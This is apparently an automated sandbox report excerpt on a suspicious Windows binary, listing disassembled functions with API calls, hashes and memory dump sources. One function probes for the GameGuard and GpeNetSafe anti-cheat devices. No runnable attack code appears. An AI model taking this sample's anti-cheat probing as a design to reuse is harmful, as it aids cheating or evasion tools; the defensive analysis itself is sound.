                                                                                                                                      • Instruction Fuzzy Hash: 313165B5E0420ABFDB14DBE4CC45FBF73B8EB48704F104958F611AB280E678A940DB55
                                                                                                                                      Function 69E90860 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E90894
                                                                                                                                      • __localtime64.LIBCMT ref: 69E908B5
                                                                                                                                        • Part of subcall function 69EBFEAE: __localtime64_s.LIBCMT ref: 69EBFEC3
                                                                                                                                      • _strftime.LIBCMT ref: 69E908D8
                                                                                                                                        • Part of subcall function 69EC1F09: __Strftime_l.LIBCMT ref: 69EC1F1E
                                                                                                                                      • _printf.LIBCMT ref: 69E908EC
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Strftime_l__localtime64__localtime64_s_memset_printf_strftime
                                                                                                                                      • String ID: %Y-%m-%d %H:%M:%S$%d: %s
                                                                                                                                      • API String ID: 1217571390-831412616
                                                                                                                                      • Opcode ID: 8c8eb53dc8f70f4ad25eb2de34449736f63e6cb76654e72b38a8d2f8262cfdb4
                                                                                                                                      • Instruction ID: 388501fb384b8889f89124db3396d9394bed248f00d20a86489d0037784ec37c
                                                                                                                                      • Opcode Fuzzy Hash: 8c8eb53dc8f70f4ad25eb2de34449736f63e6cb76654e72b38a8d2f8262cfdb4
                                                                                                                                      • Instruction Fuzzy Hash: A1212CB59043009FDB14DFA4C980B5BBBE4AF88744F54C96DF588CB249EB74D6048BA2
                                                                                                                                      Function 69EBEF37 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 69EBEF6C
                                                                                                                                      • __calloc_crt.LIBCMT ref: 69EBEF78
                                                                                                                                      • __getptd.LIBCMT ref: 69EBEF85
                                                                                                                                      • CreateThread.KERNEL32(00000000,69E84480,69EBEEC0,00000000,00000004,00000000), ref: 69EBEFAB
                                                                                                                                      • ResumeThread.KERNEL32(00000000,?,?,69E81503,69E84480,00000000,00000000), ref: 69EBEFBB
                                                                                                                                      • GetLastError.KERNEL32(?,?,69E81503,69E84480,00000000,00000000), ref: 69EBEFC6
                                                                                                                                      • __dosmaperr.LIBCMT ref: 69EBEFDE
                                                                                                                                        • Part of subcall function 69EC2DCA: __getptd_noexit.LIBCMT ref: 69EC2DCA
                                                                                                                                        • Part of subcall function 69EC24F4: __decode_pointer.LIBCMT ref: 69EC24FF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1269668773-0
                                                                                                                                      • Opcode ID: 42e8ae3c2a79642fedce74af1ba0c9e312f911b7a44113919c45765eeae63d4e
                                                                                                                                      • Instruction ID: 640949b6b39ca65375344f87b0acc06e617cfb6bf8ce56e2fb9f4fe8cf0c64a2
                                                                                                                                      • Opcode Fuzzy Hash: 42e8ae3c2a79642fedce74af1ba0c9e312f911b7a44113919c45765eeae63d4e
                                                                                                                                      • Instruction Fuzzy Hash: 2B110472904600EFD710AFB99E859AE7BA9FF41378B30416DF2319B380DB71990186A6
                                                                                                                                      Function 69E87510 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 50fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E87549
                                                                                                                                      • _sprintf.LIBCMT ref: 69E8757A
                                                                                                                                      • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000080,00000000), ref: 69E87596
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69E875A2
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCreateFileHandle_memset_sprintf
                                                                                                                                      • String ID: \\.\GameGuard$\\.\GpeNetSafe
                                                                                                                                      • API String ID: 1524418005-3021087753
                                                                                                                                      • Opcode ID: 7a3c030b47ecbfa2d361506af262a4b113280bd449337a1940cad890836deadd
                                                                                                                                      • Instruction ID: 7f9c2d6953faa75c7adb364b6e9a31d35c3a54287725ca79bc2a04a94e3c3558
                                                                                                                                      • Opcode Fuzzy Hash: 7a3c030b47ecbfa2d361506af262a4b113280bd449337a1940cad890836deadd
                                                                                                                                      • Instruction Fuzzy Hash: C4012838A583006BD710D7649D05F9E77987F56715FA0891CF6A8D62C0E7B4C20983D2
                                                                                                                                      Function 69EB5B0E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,?,69EAF240,?,00000000,69EDF73D,00000000), ref: 69EB5B1C
                                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,69EAF240,?,00000000,69EDF73D,00000000), ref: 69EB5B24
                                                                                                                                        • Part of subcall function 69EB42C0: GetModuleFileNameW.KERNEL32(?,?,00000105,?,?), ref: 69EB42F8
                                                                                                                                        • Part of subcall function 69EB42C0: SetLastError.KERNEL32(0000006F), ref: 69EB430F
                                                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,69EAF240,?,00000000,69EDF73D,00000000), ref: 69EB5B73
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 69EB5B83
                                                                                                                                        • Part of subcall function 69EB5988: GetModuleFileNameA.KERNEL32(?,?,00000104,?,?,00000000), ref: 69EB59C5
                                                                                                                                        • Part of subcall function 69EB5988: PathFindExtensionA.SHLWAPI(?), ref: 69EB59DF
                                                                                                                                        • Part of subcall function 69EB5988: __strdup.LIBCMT ref: 69EB5A27
                                                                                                                                        • Part of subcall function 69EB5988: __strdup.LIBCMT ref: 69EB5A66
                                                                                                                                        • Part of subcall function 69EB5988: __strdup.LIBCMT ref: 69EB5AAD
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorModule__strdup$FileModeName$AddressExtensionFindHandleLastPathProc
                                                                                                                                      • String ID: NotifyWinEvent$user32.dll
                                                                                                                                      • API String ID: 621541537-597752486
                                                                                                                                      • Opcode ID: c581038203b5861219923d0807f898005372cb2ac404eeef365dada8e12d9465
                                                                                                                                      • Instruction ID: dd110d3a3bf8263ff61a1cb991b4cc53093ca084d437481a5006a6d2eb42440e
                                                                                                                                      • Opcode Fuzzy Hash: c581038203b5861219923d0807f898005372cb2ac404eeef365dada8e12d9465
                                                                                                                                      • Instruction Fuzzy Hash: C20184B5A102449FDB15DFA5EA54F5D3BA9AF49324B15805FE509CB345EF30C500CBA1
                                                                                                                                      Function 69EBEEC0 Relevance: 10.5, APIs: 7, Instructions: 37threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 69EBEEC5
                                                                                                                                        • Part of subcall function 69EC7645: TlsGetValue.KERNEL32(?,69EC77D1,?,?,69E822E5,?,00000104,69EDE2A0,?,69E8101E), ref: 69EC764E
                                                                                                                                        • Part of subcall function 69EC7645: __decode_pointer.LIBCMT ref: 69EC7660
                                                                                                                                        • Part of subcall function 69EC7645: TlsSetValue.KERNEL32(00000000,?,69E822E5,?,00000104,69EDE2A0,?,69E8101E), ref: 69EC766F
                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 69EBEED0
                                                                                                                                        • Part of subcall function 69EC7625: TlsGetValue.KERNEL32(?,?,69EBEED5,00000000), ref: 69EC7633
                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 69EBEEE2
                                                                                                                                        • Part of subcall function 69EC7679: __decode_pointer.LIBCMT ref: 69EC768A
                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 69EBEEEB
                                                                                                                                      • ExitThread.KERNEL32 ref: 69EBEEF2
                                                                                                                                      • __freefls@4.LIBCMT ref: 69EBEF0E
                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 69EBEF21
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4166825349-0
                                                                                                                                      • Opcode ID: cc4deb4745c6fcb72f4f25bbb218609921bbef7597ca93f83d160c161f0c0666
                                                                                                                                      • Instruction ID: 7c18b11fb2f98cb79b59851f2bdf986c7adcc46f491d20c1a799d30eee08f06e
                                                                                                                                      • Opcode Fuzzy Hash: cc4deb4745c6fcb72f4f25bbb218609921bbef7597ca93f83d160c161f0c0666
                                                                                                                                      • Instruction Fuzzy Hash: DDF04F78500641DBDB04DB79C74892E3BA9AF5434CB30E1ADA964CB215DB36C486CAD2
                                                                                                                                      Function 00462BE0 Relevance: 9.3, APIs: 6, Instructions: 279COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1579825452-0
                                                                                                                                      • Opcode ID: d4d2e7b0b908c54d10c141abfaaf442aeee76450fbd234fcfe86b7c7d1ec6a60
                                                                                                                                      • Instruction ID: 17008752db92cdf084659bd30252b78eb53e215833165c4f0cc48f49b9a76a81
                                                                                                                                      • Opcode Fuzzy Hash: d4d2e7b0b908c54d10c141abfaaf442aeee76450fbd234fcfe86b7c7d1ec6a60
                                                                                                                                      • Instruction Fuzzy Hash: BDC15CB0D00668ABDF24DF64CD85BEEB7B1AB49304F1481DAE40967241EB799F84CF46
                                                                                                                                      Function 0044FC60 Relevance: 9.2, APIs: 6, Instructions: 172COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 0044FC85
                                                                                                                                        • Part of subcall function 004983AD: __FF_MSGBANNER.LIBCMT ref: 004983D0
                                                                                                                                        • Part of subcall function 004983AD: __NMSG_WRITE.LIBCMT ref: 004983D7
                                                                                                                                        • Part of subcall function 004983AD: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,004A296A,?,00000001,?,?,004A1322,00000018,00516498,0000000C,004A13B3), ref: 00498424
                                                                                                                                      • _memset.LIBCMT ref: 0044FCAD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap_malloc_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2365696598-0
                                                                                                                                      • Opcode ID: dd18e3e481a75b2b554141593d235bbabaae5aa43d6d1511f926d5ad12820d9d
                                                                                                                                      • Instruction ID: 6b256059b5eeab620df0fd1289ec837c345195215c84e3cd4488452ee41ac985
                                                                                                                                      • Opcode Fuzzy Hash: dd18e3e481a75b2b554141593d235bbabaae5aa43d6d1511f926d5ad12820d9d
                                                                                                                                      • Instruction Fuzzy Hash: BA714BB4E00109EBDF04DF94D986FAEB7B5FF58304F24806EE505AB381D6786A05CB59
                                                                                                                                      Function 69E8DFCB Relevance: 9.2, APIs: 6, Instructions: 169networkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$ErrorLastrecvselect
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4192477963-0
                                                                                                                                      • Opcode ID: d26722b6f1739c765a45b1042b88923dfb5c75b224922a1ec684cf17db90b6fd
                                                                                                                                      • Instruction ID: 4727549f691e8089234247b752733c77e7e08281951627928035ad7d63c6f179
                                                                                                                                      • Opcode Fuzzy Hash: d26722b6f1739c765a45b1042b88923dfb5c75b224922a1ec684cf17db90b6fd
                                                                                                                                      • Instruction Fuzzy Hash: 9F51AC75508B40DFD324DF64CA80A6BB7F5BB89314F608E2DE59A83B40DB35E8498B52
                                                                                                                                      Function 69E8F4F0 Relevance: 9.1, APIs: 6, Instructions: 139networkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E8F700: GetLocalTime.KERNEL32(?,?,?), ref: 69E8F70A
                                                                                                                                        • Part of subcall function 69E8F700: SystemTimeToFileTime.KERNEL32(?,?), ref: 69E8F71A
                                                                                                                                        • Part of subcall function 69E8F700: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 69E8F731
                                                                                                                                        • Part of subcall function 69E8F700: GetTickCount.KERNEL32 ref: 69E8F743
                                                                                                                                      • _memset.LIBCMT ref: 69E8F55D
                                                                                                                                      • sendto.WS2_32(?,?,0000002C,00000000,?,?), ref: 69E8F59F
                                                                                                                                      • _memset.LIBCMT ref: 69E8F5CB
                                                                                                                                      • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000064,00000000,?,?,?,?,?,00000000), ref: 69E8F5DF
                                                                                                                                      • WSAEnumNetworkEvents.WS2_32(?,00000000,?), ref: 69E8F5F8
                                                                                                                                      • recvfrom.WS2_32(?,?,00000100,00000000,?,?), ref: 69E8F625
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Time$Events_memset$CountEnumFileLocalMultipleNetworkSystemTickUnothrow_t@std@@@Wait__ehfuncinfo$??2@recvfromsendto
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4174193342-0
                                                                                                                                      • Opcode ID: e40daee34b04cf1c0b600770eaf172adb1559929edd73395fbce827336197d59
                                                                                                                                      • Instruction ID: e65982af24e66d77fbf0ce691d4fd97bef4128aeb66d204092bc6e371f2e383a
                                                                                                                                      • Opcode Fuzzy Hash: e40daee34b04cf1c0b600770eaf172adb1559929edd73395fbce827336197d59
                                                                                                                                      • Instruction Fuzzy Hash: CA519FB05047419FD320DFA4C941B6BB7E5BF98718F208E1DE19987290E779E844DBD2
                                                                                                                                      Function 69E8B100 Relevance: 9.1, APIs: 6, Instructions: 120COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 69E8B11B
                                                                                                                                        • Part of subcall function 69EBED6C: __FF_MSGBANNER.LIBCMT ref: 69EBED8F
                                                                                                                                        • Part of subcall function 69EBED6C: __NMSG_WRITE.LIBCMT ref: 69EBED96
                                                                                                                                        • Part of subcall function 69EBED6C: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,69EC8DFF,?,00000001,?,?,69EC7CE7,00000018,69EE8F08,0000000C,69EC7D78), ref: 69EBEDE3
                                                                                                                                      • _memset.LIBCMT ref: 69E8B139
                                                                                                                                      • _malloc.LIBCMT ref: 69E8B146
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
